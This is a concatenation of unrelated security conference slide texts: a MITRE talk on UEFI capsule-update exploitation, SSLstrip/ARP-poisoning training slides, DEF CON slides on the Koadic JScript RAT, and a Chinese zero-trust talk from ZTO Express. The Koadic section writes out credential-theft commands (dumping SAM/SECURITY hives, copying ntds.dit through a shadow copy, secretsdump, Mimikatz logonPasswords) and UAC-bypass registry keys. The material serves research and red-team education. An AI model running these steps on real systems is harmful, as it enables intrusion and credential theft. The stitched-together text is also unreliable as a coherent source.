“Spoiled onions: Exposing malicious tor exit re- lays,” in Privacy Enhancing Technologies: 14th International Symposium (PETS), Proceedings, 2014. [3] N. Mathewson, “Next-generation hidden services in tor,” https://gitweb. torproject.org/torspec.git/tree/proposals/224-rend-spec-ng.txt.
© 2014 The MITRE Corporation. All rights reserved. C orey K allenberg Xeno K ovah John B ut t erw orth Sam C ornw ell Extreme Privilege Escalation on Windows 8/UEFI Systems @ coreykal @ xenokovah @jw but terw orth3 @ssc0rnw ell | 2 | Introduction Who we are: – Trusted Computing and firmware security researchers at The MITRE Corporation What MITRE is: – A not-for-profit company that runs six US Government "Federally Funded Research & Development Centers" (FFRDCs) dedicated to working in the public interest – Technical lead for a number of standards and structured data exchange formats such as CVE, CWE, OVAL, CAPEC, STIX, TAXII, etc – The first .org, !(.mil | .gov | .com | .edu | .net), on the ARPANET © 2014 The MITRE Corporation. All rights reserved. | 3 | Attack Model (1 of 2) An attacker has gained administrator access on a victim Windows 8 machine But they are still constrained by the limits of Ring 3 © 2014 The MITRE Corporation. All rights reserved. | 4 | Attack Model (2 of 2) Attackers always want – More Power – More Persistence – More Stealth © 2014 The MITRE Corporation. All rights reserved. | 5 | Typical Post-Exploitation Privilege Escalation Starting with x64 Windows vista, kernel drivers must be signed and contain an Authenticode certificate In a typical post-exploitation privilege escalation, the attacker wants to bypass the signed driver requirement to install a kernel level rootkit Various methods to achieve this are possible, including: – Exploit existing kernel drivers – Install a legitimate (signed), but vulnerable, driver and exploit it This style of privilege escalation has been well explored by other researchers such as [6][7]. There are other, more extreme, lands the attacker may wish to explore © 2014 The MITRE Corporation. All rights reserved. | 6 | Other Escalation Options (1 of 2) There are other more interesting post-exploitation options an attacker may consider: – Bootkit the system – Install SMM rootkit – Install BIOS rootkit © 2014 The MITRE Corporation. All rights reserved. | 7 | Other Escalation Options (2 of 2) Modern platforms contain protections against these more exotic post-exploitation privilege-escalations – Bootkit the system (Prevented by Secure Boot) – Install SMM rootkit (SMM is locked on modern systems) – Install BIOS rootkit (SPI Flash protected by lockdown mechanisms) © 2014 The MITRE Corporation. All rights reserved. | 8 | Extreme Privilege Escalation (1 of 2) This talk presents extreme privilege escalation – Administrator userland process exploits the platform firmware (UEFI) – Exploit achieved by means of a new API introduced in Windows 8 © 2014 The MITRE Corporation. All rights reserved. | 9 | Extreme Privilege Escalation (2 of 2) Once the attacker has arbitrary code execution in the context of the platform firmware, he is able to: – Control other "rings" on the platform (SMM, Ring 0) – Persist beyond operating system re-installations – Permanently "brick" the victim computer © 2014 The MITRE Corporation. All rights reserved. | 10 | Target Of Attack Modern Windows 8 systems ship with UEFI firmware UEFI is designed to replace conventional BIOS and provides a well defined interface to the operating system © 2014 The MITRE Corporation. All rights reserved. | 11 | Windows 8 API Windows 8 has introduced an API that allows a privileged userland process to interface with a subset of the UEFI interface © 2014 The MITRE Corporation. All rights reserved. | 12 | EFI Variable Creation Flow Certain EFI variables can be created/modified/deleted by the operating system – For example, variables that control the boot order and platform language The firmware can also use EFI variables to communicate information to the operating system © 2014 The MITRE Corporation. All rights reserved. | 13 | EFI Variable Consumption The UEFI variable interface is a conduit by which a less privileged entity (admin Ring 3) can produce data for a more complicated entity (the firmware) to consume This is roughly similar to environment variable parsing attack surface on *nix systems © 2014 The MITRE Corporation. All rights reserved. | 14 | Previous EFI Variable Issues (1 of 2) We’ve  already  co-discovered[13] with Intel some vulnerabilities associated with EFI Variables that allowed bypassing secure boot and/or bricking the platform © 2014 The MITRE Corporation. All rights reserved. | 15 | Previous EFI Variable Issues (2 of 2) However, VU #758382 was leveraging a proprietary Independent BIOS Vendor (IBV) implementation mistake, it would be more interesting if we could find a variable vulnerability more generic to UEFI © 2014 The MITRE Corporation. All rights reserved. | 16 | UEFI Vulnerability Proliferation If an attacker finds a vulnerability in the UEFI "reference implementation," its proliferation across IBVs and OEMs would potentially be wide spread. – More  on  how  this  theory  works  "in  practice"  later… © 2014 The MITRE Corporation. All rights reserved. | 17 | Auditing UEFI UEFI reference implementation is open source, making it easy to audit Let the games begin: – Svn checkout https://svn.code.sf.net/p/edk2/code/trunk/edk2/ http://tianocore.sourceforge.net/wiki/Welcome © 2014 The MITRE Corporation. All rights reserved. | 18 | Where to start looking for problems? Always start with wherever there is attacker-controlled input We had good success last year exploiting Dell systems by passing an specially-crafted  fake  BIOS  update… So let's see if UEFI has some of the same issues The UEFI spec has outlined a "Capsule update" mechanism – Capsule Update is initiated and guided by EFI variable contents that are controllable by the operating system © 2014 The MITRE Corporation. All rights reserved. | 19 | Capsule Scatter Write To begin the process of sending a Capsule update for processing, the operating system takes a firmware capsule and fragments it across the address space © 2014 The MITRE Corporation. All rights reserved. | 20 | Capsule Processing Initiation The operating system creates an EFI variable that describes the location of the fragmented firmware capsule A "warm reset" then occurs to transition control back to the firmware © 2014 The MITRE Corporation. All rights reserved. | 21 | Capsule Coalescing The UEFI code "coalesces" the firmware capsule back into its original form. © 2014 The MITRE Corporation. All rights reserved. | 22 | Capsule Verification UEFI parses the envelope of the firmware capsule and verifies that it is signed by the OEM © 2014 The MITRE Corporation. All rights reserved. | 23 | Capsule Consumption Contents  of  the  capsule  are  then  consumed…. – Flash contents to the SPI flash – Run malware detection independent of the operating system – Etc… © 2014 The MITRE Corporation. All rights reserved. | 24 | Opportunities For Vulnerabilities There are 3 main opportunities for memory corruption vulnerabilities in the firmware capsule processing code 1. The coalescing phase 2. Parsing of the capsule envelope 3. Parsing of unsigned content within the capsule Our audit of the UEFI capsule processing code yielded multiple vulnerabilities in the coalescing and envelope parsing code – The first "BIOS reflash" exploit was presented by Wojtczuk and Tereshkin. They found it by reading the UEFI code which handled BMP processing and exploiting an unsigned splash screen image embedded in a firmware[1] © 2014 The MITRE Corporation. All rights reserved. | 25 | Coalescing Bug #1 Bug 1: Integer overflow in capsule size sanity check – Huge CapsuleSize may erroneously pass sanity check Edk2/MdeModulePkg/Universal/CapsulePei/Common/CapsuleCoalesce.c © 2014 The MITRE Corporation. All rights reserved. | 26 | Coalescing Bug #2 Bug 2: Integer overflow in fragment length summation – CapsuleSize may be less than true summation of fragment lengths Edk2/MdeModulePkg/Universal/CapsulePei/Common/CapsuleCoalesce.c © 2014 The MITRE Corporation. All rights reserved. | 27 | Envelope Parsing Bug (Bug #3) Bug 3: Integer overflow in multiplication before allocation – LbaCache may be unexpectedly small if NumBlocks is huge Edk2/MdeModulePkg/Core/Dxe/FwVolBlock/FwVolBlock.c © 2014 The MITRE Corporation. All rights reserved. | 28 | Miscellaneous Coalescing Bug (Bug #4) Bug 4: Integer overflow in IsOverlapped – Can erroneously return False if Buff1+Size1 overflows – This  didn’t  directly  lead  to  a  vulnerability  but  we  had  to  abuse  it  to   successfully exploit the other bugs Edk2/MdeModulePkg/Universal/CapsulePei/Common/CapsuleCoalesce.c © 2014 The MITRE Corporation. All rights reserved. | 29 | Vulnerabilities Summary We spent ~1 week looking at the UEFI reference implementation and discovered vulnerabilities in security critical code – The identified vulnerabilities occur before the update is cryptographically verified The presence of easy to spot integer overflows in open source and security critical  code  is…  disturbing – Is no one else looking here? ValidateCapsuleIntegrity: Edk2/MdeModulePkg/Universal/CapsulePei/Common/CapsuleCoalesce.c © 2014 The MITRE Corporation. All rights reserved. | 30 | Onward To Exploitation The aforementioned code runs with read-write-execute permissions – Flat protected mode with paging disabled – No mitigations whatsoever However, successful exploitation in this unusual environment was non-trivial © 2014 The MITRE Corporation. All rights reserved. | 31 | Coalescing Exploit Attempt Attempt #1: Provide a huge capsule size and clobber our way across the address space to some function pointer on the stack area © 2014 The MITRE Corporation. All rights reserved. | 32 | Coalescing Exploit Fail Overwriting certain regions of the address space had undesirable results We had to come up with an approach that skipped past the forbidden region © 2014 The MITRE Corporation. All rights reserved. See whitepaper for full details on the exploitation technique | 33 | Coalescing Exploit Success Came up with a multistage approach that involved corrupting the descriptor array – Achieve surgical write-what-where primitive – Combined bugs #1, #2, #4 and abused a CopyMem optimization See whitepaper for full details on the exploitation technique © 2014 The MITRE Corporation. All rights reserved. | 34 | Envelope Parsing Exploitation Exploitation of the "envelope parsing" bug was complicated for several reasons Note that in order to trigger the undersized LbaCache allocation, the NumBlocks value must be huge – This effectively means that the corrupting for() loops will never terminate Edk2/MdeModulePkg/Core/Dxe/FwVolBlock/FwVolBlock.c © 2014 The MITRE Corporation. All rights reserved. | 35 | Total Address Space Annihilation Loop will corrupt entire address space and hang the system © 2014 The MITRE Corporation. All rights reserved. | 36 | Other Complications LbaCache pointer is overwritten by the corruption, further complicating things Values being written during the corruption are not entirely attacker controller © 2014 The MITRE Corporation. All rights reserved. | 37 | Corruption Direction Change Overwriting the LbaCache pointer changes the location the corruption continues at © 2014 The MITRE Corporation. All rights reserved. | 38 | Difficulties Recap An attacker has some serious hoops to jump through to successfully exploit the envelope parsing vulnerability – Corrupting of base pointer for corruption (LbaCache) – Only partially controlled values being written – Corrupting loop will never terminate © 2014 The MITRE Corporation. All rights reserved. | 39 | Self-overwriting Code Our approach to escaping the non-terminating for loop was to massage the corruption so the loop would self-overwrite In this case, we overwrite the top of the basic block with non-advantageous x86 instructions – Overwritten values only "semi-controlled" © 2014 The MITRE Corporation. All rights reserved. | 40 | Self-overwriting Success With some brute force we discovered a way to overwrite the looping basic block with advantageous attacker instructions – Jump to uncorrupted shellcode © 2014 The MITRE Corporation. All rights reserved. | 41 | Exploitation Mechanics Summary Vulnerable code runs with read-write-execute permissions and no mitigations However, successful exploitation was still complicated Capsule coalescing exploit allows for surgical write-what-where primitive resulting in reliable exploitation of the UEFI firmware – Address space is almost entirely uncorrupted so system remains stable Capsule envelope parsing vulnerability can be exploited but corrupts a lot of the address space – System probably in an unstable state In both cases, attacker ends up with control of EIP in the early boot environment © 2014 The MITRE Corporation. All rights reserved. | 42 | Exploitation Flow (1 of 8) Our Sith attacker is unimpressed with his ring 3 admin privileges and seeks to grow his power through the dark side of the force © 2014 The MITRE Corporation. All rights reserved. | 43 | Exploitation Flow (2 of 8) Attacker seeds an evil capsule update into memory Attacker then uses SetFirmwareEnvironmentVariable to prepare the firmware to consume the evil capsule Shellcode to be executed in the early boot environment is staged in memory © 2014 The MITRE Corporation. All rights reserved. | 44 | Exploitation Flow (3 of 8) Warm reset is performed to transfer context back to UEFI © 2014 The MITRE Corporation. All rights reserved. | 45 | Exploitation Flow (4 of 8) Capsule processing is initiated by the existence of the "CapsuleUpdateData" UEFI variable © 2014 The MITRE Corporation. All rights reserved. | 46 | Exploitation Flow (5 of 8) UEFI begins to coalesce the evil capsule © 2014 The MITRE Corporation. All rights reserved. | 47 | Exploitation Flow (6 of 8) UEFI becomes corrupted while parsing evil capsule © 2014 The MITRE Corporation. All rights reserved. | 48 | Exploitation Flow (7 of 8) Attacker gains arbitrary code execution in the context of the early boot environment – Platform is unlocked at this point © 2014 The MITRE Corporation. All rights reserved. | 49 | Exploitation Flow (8 of 8) Attacker can now establish agents in SMM and/or the platform firmware to do their bidding © 2014 The MITRE Corporation. All rights reserved. | 50 | Unnatural Powers With these new powers, our attacker can: – Brick the platform – Defeat Secure Boot[2] – Establish an undetectable SMM rootkit[8][5] – Subvert hypervisors[9] – Subvert TXT launched hypervisors[3] – Circumvent operating system security functions[11] – Survive operating system reinstallation attempts – Other? © 2014 The MITRE Corporation. All rights reserved. | 51 | Demo Time © 2014 The MITRE Corporation. All rights reserved. | 52 | Vendor Response We told Intel & CERT about the bugs we found on Nov 22nd and Dec 4th 2013 – We conveyed that we would extend our typical 6 month responsible disclosure deadline, and we would be targeting public disclosure in the summer at BlackHat/Defcon – We also directly contacted some of the OEMs that we already had the capability to send encrypted email to Intel queried UEFI partners to ask if they were using the affected code If the vendors said they thought they would be affected, then Intel sent them the details Then we didn't hear anything for a while Eventually Intel indicated which vendors said they were vulnerable, and which systems would be patched. This information is conveyed in CERT VU #552286 The UEFI forum is in the process of setting up a UEFI Security Response Team to better coordinate these sort of disclosures in the future. Shooting to go live by Sept 1. © 2014 The MITRE Corporation. All rights reserved. | 53 | What can you do about it? Run Copernicus. It has been updated to automatically report if your system is on the VU # 552286 affected list – http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity- blog/copernicus-question-your-assumptions-about or just search for "MITRE Copernicus" We also have a binary integrity checking capability for Copernicus. This can help you detect if your BIOS has been backdoored – The capability is freely available, but it's not as simple and foolproof as the public Copernicus (it will have false positives/negatives). And we don't really have the resources to support it for everyone. Therefore we prioritize who we work with to use it, based on the number of systems that will be checked. So if you're serious about checking your BIOSes, email copernicus@mitre.org We also need this data to feed further research results on the state of BIOS security in the wild on deployed systems. Unlike the IPMI people, we can't just portscan networks to get 100k research results :P © 2014 The MITRE Corporation. All rights reserved. | 54 | What can you do about it? If you're a security vendor, start including BIOS checks – If you're a customer, start asking for BIOS checks We are happy to freely give away our Copernicus code to get vendors started with incorporating checking BIOSes. All we ask for in return is some data to help further our research. We want BIOS configuration & integrity checking to become standard capabilities which are widely available from as many vendors as possible. – No more massive blind spot please! © 2014 The MITRE Corporation. All rights reserved. | 55 | Conclusion UEFI has more tightly coupled the bonds of the operating system and the platform firmware Specifically, the EFI variable interface acts as a conduit by which a less privileged entity (the operating system) can pass information for consumption by a more privileged entity (the platform firmware) – We have demonstrated how a vulnerability in this interface can allow an attacker to gain control of the firmware Although the authors believe UEFI to ultimately be a good thing for the state of platform security, a more thorough audit of the UEFI code and its new features is needed Copernicus continues to be updated to give the latest information about whether vulnerabilities affect your BIOS © 2014 The MITRE Corporation. All rights reserved. | 56 | Questions & Contact {ckallenberg, xkovah, jbutterworth, scornwell} @ mitre . org Copernicus @ mitre . org @coreykal, @xenokovah, @jwbutterworth3, @ssc0rnwell @MITREcorp P.s., go check out OpenSecurityTraining.info! @OpenSecTraining © 2014 The MITRE Corporation. All rights reserved. | 57 | References [1] Attacking Intel BIOS – Alexander Tereshkin & Rafal Wojtczuk – Jul. 2009 http://invisiblethingslab.com/resources/bh09usa/Attacking%20Intel%20BIOS.pdf [2] A Tale of One Software Bypass of Windows 8 Secure Boot – Yuriy Bulygin – Jul. 2013 http://blackhat.com/us-13/briefings.html#Bulygin [3] Attacking Intel Trusted Execution Technology - Rafal Wojtczuk and Joanna Rutkowska – Feb. 2009 http://invisiblethingslab.com/resources/bh09dc/Attacking%20Intel%20TXT%20- %20paper.pdf [4] Defeating Signed BIOS Enforcement – Kallenberg et al., Sept. 2013 – http://www.mitre.org/sites/default/files/publications/defeating-signed-bios- enforcement.pdf [5] BIOS Chronomancy: Fixing the Core Root of Trust for Measurement – Butterworth et al., May 2013 http://www.nosuchcon.org/talks/D2_01_Butterworth_BIOS_Chronomancy.pdf [6] IsGameOver() Anyone? – Rutkowska and Tereshkin – Aug 2007 http://invisiblethingslab.com/resources/bh07/IsGameOver.pdf [7] Defeating Windows Driver Signature Enforcement – j00ru - Dec 2012 http://j00ru.vexillium.org/?p=1455 © 2014 The MITRE Corporation. All rights reserved. | 58 | References 2 [8] Copernicus 2 – SENTER The Dragon – Kovah et al. – March 2014 http://www.mitre.org/sites/default/files/publications/Copernicus2-SENTER-the- Dragon-CSW-.pdf [9] Preventing and Detecting Xen Hypervisor Subversions – Rutkowska and Wojtczuk – Aug 2008 http://www.invisiblethingslab.com/resources/bh08/part2- full.pdf [10] A New Breed of Rootkit: The Systems Management Mode (SMM) Rootkit – Sparks and Embleton – Aug 2008 http://www.eecs.ucf.edu/~czou/research/SMM- Rootkits-Securecom08.pdf [11] Using SMM for "Other Purposes" – BSDaemon et al – March 2008 http://phrack.org/issues/65/7.html [12] Using SMM to Circumvent Operating System Security Functions – Duflot et al. – March 2006 http://fawlty.cs.usfca.edu/~cruse/cs630f06/duflot.pdf [13] Setup for Failure: Defeating UEFI SecureBoot – Kallenberg et al. – April 2014 http://www.syscan.org/index.php/download/get/6e597f6067493dd581eed737146f 3afb/SyScan2014_CoreyKallenberg_SetupforFailureDefeatingSecureBoot.zip © 2014 The MITRE Corporation. All rights reserved.
Hijacking Web 2.0 Sites with SSLstrip Hands-on Training Contact  Sam Bowne  Computer Networking and Information Technology  City College San Francisco  Email: sbowne@ccsf.edu  Web: samsclass.info The Problem  HTTP Page with an HTTPS Logon Button Proxy Changes HTTPS to HTTP Target Using Facebook Attacker: Evil Proxy in the Middle To Internet HTTP HTTPS Ways to Get in the Middle Physical Insertion in a Wired Network Target Attacker To Internet Configuring Proxy Server in the Browser ARP Poisoning  Redirects Traffic at Layer 2  Sends a lot of false ARP packets on the LAN  Can be easily detected  DeCaffienateID by IronGeek  http://k78.sl.pt ARP Request and Reply  Client wants to find Gateway  ARP Request: Who has  ARP Reply:  MAC: 00-30-bd-02-ed-7b has Client Gateway Facebook.com ARP Request ARP Reply ARP Poisoning Client Gateway Facebook.com Attacker ARP Replies: I am the Gateway Traffic to Facebook Forwarded & Altered Traffic Demonstration Do it Yourself  You need a laptop with  Windows host OS  VMware Player or Workstation  Linux Virtual Machine (available on the USB Hard Drives in the room)  Follow the Handout
Koadic C3 COM Command & Control DEF CON 25 - July 2017 Agenda ● Current open-source "malware" options for red teams ● Koadic (C3) ○ Advanced JScript/VBScript RAT ● The hell we went through ● Demos whoami /all ● @zerosum0x0 ● @Aleph___Naught ● @JennaMagius ● @The_Naterz Red Team @ RiskSense, Inc First things first... ● "SMBLoris" attack ○ Windows 0-day denial-of-service SMBLoris Notes ● Not responsible for other people's actions ● A ton of overlapping research, incremental work ○ Consolidate research/techniques ○ "Advances state of the art" ● Meme slides = dirty hack/workaround ● Prototype ○ Used on real engagements ○ Submit fixes, not tixes Intrusion Phases ● Reconnaissance ● Initial Exploitation ● Establish Persistence ● Install Tools ● Move Laterally ● Collect, Exfil, and Exploit Source: Rob Joyce, NSA/TAO Director, Enigma 2016 Current State of Windows Post Exploitation ● Yet but a few open-source "malware" options for red teams ○ Meterpreter ○ Cobalt Strike ○ PowerShell Empire ● Roll your own… ○ A decent option- the bad guys do Downsides of PE Malware ● Meterpreter is amazing software! ● Post-exploitation (and some exploits [psexec]) often involve dropping a binary ○ Binaries are what AV love ○ Need to evade payload ■ Veil Evasion ■ Shellter Downside of PowerShell ● Empire is amazing software! ● Requires PowerShell (duh) ○ Officially- Server 2008 SP2* ○ Requires modern .NET ● Extensive logging/disabling mechanisms * https://msdn.microsoft.com/en-us/powershell/scripting/setup/windows-powershell-system-requirements WTS C3 - COM C&C ● Target Win2k SP0 ○ Possibly earlier ● JScript/VBScript ○ Baked directly into the core of Windows ■ Not an addon-- harder to limit ○ Powerful COM exposed by the OS ○ Creative use of default .exe's ● Ways to execute completely in memory ○ The main benefit of PowerShell COM Background ● Component Object Model ○ Language neutral ○ Object oriented ○ Binary interface ○ Distributed ● Arguable precursor to .NET ○ Slightly different goals and implementation ■ AKA "still relevant"? ● Found EVERYWHERE in Windows Downsides of WSH ● No access to Windows API ● No real threading ● Missing a lot of "standard" functions ○ Base64 ■ Can be done with other programs ● Unicode strings ○ Bad for making structs/shellcode Downsides of VBScript ● Shlemiel the Painter problem with string indexing (Mid) ○ Inefficient string iterations ○ @JennaMagius: "Bring the Bucket With You" ● Insane exception handling method ○ "On error resume next", for every scope ● Definitely not lingua franca Readline Improvements ● Readline is the interactive shell ● When shells/messages start to rain in… ○ Output overwrites input ● @JennaMagius fixed it, redraw ○ Commit to Metasploit in PR #7570 ○ Still an issue in Empire Koadic Terminology ● Zombie ○ a hooked target ● Stager ○ web server to perform hook ● Implant ○ starts jobs on a zombie ● Job ○ does something interesting Architecture Overview Plugin Architecture ● run() method ○ Stager - Spawns HTTP server ○ Implant - Starts Job ● ~VARIABLE~ based JS files ● "stdlib.js" helper functions ○ Run commands ○ Upload/download ○ File I/O ○ HTTP I/O ■ Report on jobs Implant Categories ● Pivot ● Persistence ● Manage ● Elevate ● Gather ● Scan ● Fun ● Inject Stager Architecture ● Generally, hook by manual command ○ Can hook from IE, Office macros, etc. ● Python simple HTTP/S threaded server ○ Encryption through TLS/SSL (depending on target) ● Long-poll ● When a job is ready, clones itself twice and dies Stager Job Cloning ● Hook: If not "Session ID" ○ Assigned a session ID ■ Fork stage ● Stage: If "Session ID" present ○ long-poll to get a "Job ID" ■ Fork stage ■ Fork job ■ Exit ● Job: If "Session ID" && "Job ID" ○ Send job payload ■ Do work ■ Report ■ Exit regsvr32.exe ● COM Scriptlets ○ Still written to disk ● Present on Windows 2000 ● Less sandboxed than MSHTA MSHTA.exe Stager ● HTML "Applications" ○ Access to registry, filesystem, shell, etc. ○ Some IE security zone sandboxing ● Payload is tiny ○ But missing on Windows 2000 Hidden HTA ● Experimented with many techniques to hide window ● Later saw malware samples do same thing rundll32.exe ● Abuses path/command line parsing ○ Loads MSHTML.DLL ○ Executes JScript ● Basically same thing as mshta.exe ● Less Window visibility ○ MSHTA stager forks to rundll32.exe Script Unresponsive ● Can long-poll HTTP forever, np ○ Because it's a COM call ● Run too many lines of JScript ○ Even just a few milliseconds? ○ Abort!! HKCU\Software\Microsoft\Internet Explorer\Styles\MaxScriptStatements "Uploading" Files ● Binary data is hard to work with… ● Writing byte-by-byte uses limited instructions ● Adodb.Stream.Write(http.responseBody) ○ Can't write stream directly to file ○ But… information theory allows it "Uploading" Files "Downloading" Files ● Post data is double encoded ○ Windows-1252 ○ UTF-8 ● Can't send NULL bytes \x00 ○ We add another layer of encoding ■ \\ = \\\\ ■ \0 = \\\x30 ● Extremely slow to decode() ○ So we use hard-coded lookup table DEMO Upload+Download, SHA256 verify UAC Bypasses ● eventvwr.exe by @enigma0x3 ○ HKCU\Software\Classes\mscfile\shell\open\command ● sdclt.exe by @enigma0x3 ○ HKCU\Software\Classes\exefile\shell\runas\command ● fodhelper.exe by winscripting.blog ○ HKCU\Software\Classes\ms-settings\shell\open\command ● UACME by @hFireF0X ○ Future work, 35+ methods Dumping NTLM on Local Machines ● Stored in registry hives ○ reg save HKLM\SAM sam.dmp /y ○ reg save HKLM\SYSTEM system.dmp /y ○ reg save HKLM\SECURITY security.dmp /y ● Download to C3 server ● Decode with CoreSecurity/Impacket ○ secretsdump.py -sam %s -system %s -security %s LOCAL Dumping NTLM from Domain Controllers ● Make shadow copy ○ vssadmin create shadow /for=C: ○ copy shadow\windows\ntds\ntds.dit %TEMP%\ntds.dit ○ reg save HKLM\SECURITY security.dmp ● Download to C3 Server ● Decode with CoreSecurity/Impacket ○ secretsdump.py -ntds %s -system %s -hashes LMHASH:NTHASH LOCAL DEMO Bypass UAC, Hashdump HTTP ● Several HTTP COM Object ProgIDs ○ Msxml2.XMLHTTP ○ Msxml2.ServerXMLHTTP ○ Microsoft.XMLHTTP ○ Microsoft.ServerXMLHTTP ○ WinHttp.WinHttpRequest ○ etc. ● Same basic interface ○ Drastically different behaviors TCP Scanner ● Use HTTP object to "port scan" ○ AJAX Port Scanner ● Depending on status code, determine if port open PSExec ● Microsoft signed ● No need to "upload" binary ○ \\live.sysinternals.com@SSL\tools\ ● "Dirty bit" are you sure? ○ Bypass is: use a different way to exec it? ● psexec \\computer\ -u domain\user -p pwd -accepteula ~CMD~ WMI ● Start command remotely ● Runs in session 0 ○ No GUI = no UAC bypass ■ Need hacks DEMO TCP Scan, Pivot Excel COM Object ● Work gave us Office licenses, we found a good use for them… ● Many workstations have Office ● Excel spreadsheets can be created in memory ○ No need for GUI at all ● Excel spreadsheets have macros ○ Run any VBA, with access to Windows API ■ Shellcode ■ Reflective DLLS DotNetToJs ● Attack by @tiraniddo ● Uses COM objects installed with .NET ● Load custom serialized object ○ Access to Windows API DynamicWrapperX ● Written by Yuri Popov (Freeware) ● Allows access to Windows API ● Drop DLL and Manifest ● Registration-free COM ○ Avoids COM registry writes ○ @subTee "re-discovered" powerkatz.dll ● @clymb3r fork added to Mimikatz core ○ Goal: we want to use this existing DLL ● PowerShell Empire uses "memory module" ○ DLL mapping performed in PowerShell ■ Not reflective injection ■ We're limited on instructions ● "mimishim.dll" mimishim.dll ● Normal Reflective DLL ● Built-in HTTP ● Determines if x64 system and x86 process ○ Forks if necessary ● Process hollowing of %WINDIR%\sysnative\notepad.exe ● Injects powerkatz.dll ○ privilege::debug - SeDebugPrivilege ○ token::elevate - NT AUTHORITY\SYSTEM ○ Runs the custom command ■ sekurlsa::logonPasswords DEMO Mimikatz Mitigations ● Device Guard/AppLocker/CI ● Block: ○ WSH ○ HTA ○ SCT ● Delete all .exes! ● Delete all COM objects! ○ Including script parsers! Add to Metasploit ● Additional targets for command/Binary drop modules ○ Such as psexec ● Iterate over all methods of forking to shellcode ○ Until one works Future Work ● Clean up code ● JavaScript Minimizer/obfuscator ● getsystem ● Persistence implants ● Close some DoS vectors Related Talks ● COM in Sixty Seconds ○ James Forshaw @ INFILTRATE 2017 ● Windows Archaeology ○ Casey Smith and Matt Nelson @ BSides Nashville 2017 ● Establishing a Foothold with JavaScript ○ Casey Smith @ Derbycon 2016 Thanks! ● @zerosum0x0 ● @Aleph___Naught https://github.com/zerosum0x0/koadic ● DEF CON Workshop - Saturday @ 14:30 - Octavarius 5 ○ Windows Post-Exploitation/Malware Forward Engineering ○ shellcode, winapi, COM, .NET
零信任在中通黑灰产对抗的实践 零信任在中通黑灰产对抗的实践 中通快递 朱颖骏 目录 CONTENT 目录>> 02 04 03 成效 01 背景 挑战 零信任安全 总结 05 背景 01 背景 01 背景 业务背景 170亿 业务量全球第一 2000亿港元 纽约/香港上市 50万+ 中通人遍布全国 3万+ 网点达全国 01 背景 监管背景 信息安全监管 落实企业网络安全主体责任 加强个人用户信息保护 提高企业的信息安全意识水平 《中华人民共和国网络安全法》 《关键信息基础设施安全保护条例》 《中华人民共和国个人信息保护法》 《中华人民共和国数据安全法》 挑战 02 挑战 技术挑战 自研1000+应用 外购、本地部署、公有云部署 频繁变动的人员、设备和组织 庞大的用户数据 4亿+ 业务流程隐私数据 业务分支机构全球分布 4W+网点 技术架构多样 业务变更频繁 敏感数据庞大 组织分布广泛 安全挑战 OWASP TOP 10 常规漏洞 骗取帐号、骗取认证信息、威逼利诱 社工、APT攻击 利用职务获取利益 内鬼、内外勾结 0Day、未知手法 零信任安全 03 零信任安全 零信任理念 身份、认证、授权 IAM 工作负载微隔离技术 MSG 用户侧软件定义边界 零信任 Never Trust,Always Verify SDP 零信任原则 网络身份的治理原则 所有资源操作的认证与授权都是动态的,并需要严格执行 01 资源的治理的原则 企业的所有资产都被视为资源 企业应确保所拥有的资产都应处于最安全的状态 02 应用于数据访问的原则 所有的通信在安全的方式下完成(网络位置并不安全) 基于每个会话的细粒度最小化授权 访问资源的权限由动态策略决定 包括客户端、应用、服务、资 源等多中信息 企业尽可能多地收集有关资产,网络基础设施和通信的当前状态 的信息,并使用这些信息来改善其安全状况 03 漏洞 社 工 0Day 内 鬼 零信任与业务风控 零信任与业务风控 多维数据支撑 多样策略执行点 身份、权限、资源的安全状态 认证服务 网关层 终端 访问主体属性 环境信息 访问客体信息 存在的问题 LOREM IPSUM DOLOR 终端多、不受控 密码被泄露 帐号管理混乱 权限管控混乱 权限管控混乱 事件追溯难 探索路线 01 02 03 04 统一身份、统一权限 零信任网关、SDP 免密登录/MFA 基于信任评估的动态访问控制策略 统一身份 集中 管控 帐号创 建 转岗离 职 管理 自动化 自助 服务 风险预 警 全生命周期 身份同 步 多身份类型 灵活定 义 多租户 EIAM CIAM IoT 身份互 通 身份属 性 身份平台 混合云 协议支 持 用户目 录 SCIM 自研 应用 外采应 用 遗产应 用 统一认证 跨应用、跨帐号体系单点登录 支持多种认证协议 SAML、OAuth2.0、OIDC、JWT、LDAP 支持多种认证方式 • 三方认证:企业联邦认证、企业社交认证、个人社交认证 • 生物认证:指纹、人脸、虹膜等 • 非生物认证:帐号密码、手机OTP、动态令牌、数字证书 MFA编排 • 自定义认证流程 • 认证自由编排:串行/并行组合认证、多步骤认证 • 认证前、中、后触发事件灵活配置 框架集成 • 将认证服务封装为统一API、组件SDK • 支持各种开发框架语言快速对接 • 一次对接一键化拥有全部认证方式 智能认证 • 结合访问时间、位置、习惯、设备、关系行为等进行 全面评估,根据使用场景,智能控制认证级别 统一权限 入职赋权 通用 权限授权 权限 授权审计 特殊 权限申请 权限审批 权限 使用审计 吊销 回收 业务闭环 权限 模型设计 授权链 行权 鉴权 权限审计 风险评估 权限治理 管理闭环 接入应用1000+ 权限条目 30000+ 零信任网关 零信任流量治理思路 第一步 全面身份化 构建信任 01 02 03 04 第二步 全流量覆盖 全资源保护 第三步 分层治理 流量漏斗 第四步 行为分析 动态访问控制 资源访问典型处理过程 Step 01 Authenticated Step 03 Bot Detection Step 05 Policy Execution Step 02 Authorized Step 04 Attack Detection 员工安全工作台 安全 DLP 网络准入 证书及可 信 杀毒防护 SDP 安全中心 协作 业务 小程序 应用门户 开发框架 公众号 即时通讯 日程 音视频会议 投屏 推送体系 云盘 工作流 企业通讯录 文档中台 邮箱 有端模式的SDP 问题发现与取证 过去 现在 行为日志 依赖业务接入 用户在所有系统的所有行为日志 数据混乱 域名资产理不清 应用、URL与权限对应关系清晰 拦截方式 拦截方式单一 IP、用户、手机号、组织等多维拦截 证据 现场证据缺失 用户实名与多种行为挑战 风控 应用 系统 用户 设备 访问控制决策点 信息 风险分 环境风险分析 时间风险分析 设备风险分析 用户行为分析 威胁情报风险分析 · · · 位置 IP 时间 场景属性 外部分析平台 应用 功能 数据 接口 文件 安全风险识别与感知平台 成效 04 成效 无侵入式业务风控 成效 iOS、Android、Windows、 Mac全覆盖 由配合处理到主动发现 基于策略的细粒度访问控制 SDP与细粒度的访问控制 独立处置能力提升明显 终端用户45W+ 主动发现 动态信任评估 无VPN化 信息泄露逐年减少 处置能力 总结 05 总结 总结 零信任正在成为安全建设的主方向 软件定义安全 构建多维信任 动态访问控制 黑灰产对抗利器 提问环节 提问环节 关注中通安全 加我为好友
